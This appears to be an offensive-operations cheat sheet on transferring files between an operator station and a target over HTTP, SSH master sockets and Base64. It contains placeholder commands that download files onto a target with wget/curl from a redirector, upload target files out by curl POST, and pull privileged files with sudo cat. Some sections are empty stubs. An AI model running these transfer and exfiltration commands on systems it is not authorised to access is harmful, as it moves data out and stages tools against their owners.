# **Basic Information**
# **Linux**
## **HTTP**
```bash
# run on the op station
python3 -m http.server <REDIR_PORT>
python3 -m pip install --user uploadserver
python3 -m uploadserver -d <LOCAL_DIR> --basic-auth <USER>:<PASSWORD> <REDIR_PORT>
# run on target
wget http://<REDIR_IP>:<REDIR_PORT>/<LOCAL_FILE>
curl http://<REDIR_IP>:<REDIR_PORT>/<LOCAL_FILE> -o <REMOTE_FILE>
curl -X POST <http://<REDIR_IP>:<REDIR_PORT>/upload> -F 'files=@<LOCAL_FILE>' -u <USER>:<PASSWORD>
```
## **SSH**
```bash
# ensure ControlMaster is enabled for the ssh client
# echo " ControlMaster auto" | sudo tee -a /etc/ssh/ssh_config
# sudo systemctl restart ssh
# connect to target and setup a master socket
ssh -M -S /tmp/socket_name -p <TGT_PORT> <USER>@<TGT_IP> -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no
# have permissions to read the remote file, pull to local host
scp -o ControlPath=/tmp/socket_name -s -T dummy:'/remote/file.txt' <LOCAL_FILE>
# have permissions to read directory, pull to local host
scp -o ControlPath=/tmp/socket_name -s -T -r dummy:'/remote/dir' <LOCAL_DIR>
# do not have rights to read file, pull to local host
ssh -S /tmp/socket_name dummy "sudo cat <REMOTE_FILE>" > <LOCAL_FILE>
# push a file to the target
scp <LOCAL_FILE> <USER>@<TGT_IP>:<REMOTE_FILE>
```
## **Base64**
```bash
# run on the op station
file <LOCAL_FILE>
md5sum <LOCAL_FILE>
base64 <LOCAL_FILE> -w 0
# run on target, validate transfer was successful via hash
echo <BASE64_ENCODED_DATA> | base64 -d > <LOCAL_FILE>
file <LOCAL_FILE>
md5sum <LOCAL_FILE>
```
# **Windows**
## **SSH**
```bash
# to enable master sockets, modify the client config so that ControlMaster is set to auto or yes
# connect to target and setup a master socket
ssh -M -S /tmp/socket_name -p <TGT_PORT> <USER>@<TGT_IP> -o UserKnownHostsFile=/dev/null -o StrictHostKeyChecking=no
# have permissions to read the remote file, pull to local host
scp -o ControlPath=/tmp/socket_name -s -T dummy:'C:\\remote\\file.txt' <LOCAL_FILE>
scp -o ControlPath=/tmp/socket_name -s -T'@:/C:/remote/*.log' <LOCAL_FILE>
# have permissions to read directory, pull to local host
scp -o ControlPath=/tmp/socket_name -s -T -r dummy:'C:\\remote\\dir' <LOCAL_DIR>
# push a file to the target
scp <LOCAL_FILE> <USER>@<TGT_IP>:<REMOTE_FILE>
```
## **Base64**
```bash
# run on the op station
# run on target
```
# **References**
- [Using the SSH "Konami Code" (SSH Control Sequences)](https://www.sans.org/blog/using-the-ssh-konami-code-ssh-control-sequences)
# **Practical Application**
| Platform | Name | Notes |
| -------- | ---- | ----- |
| | | |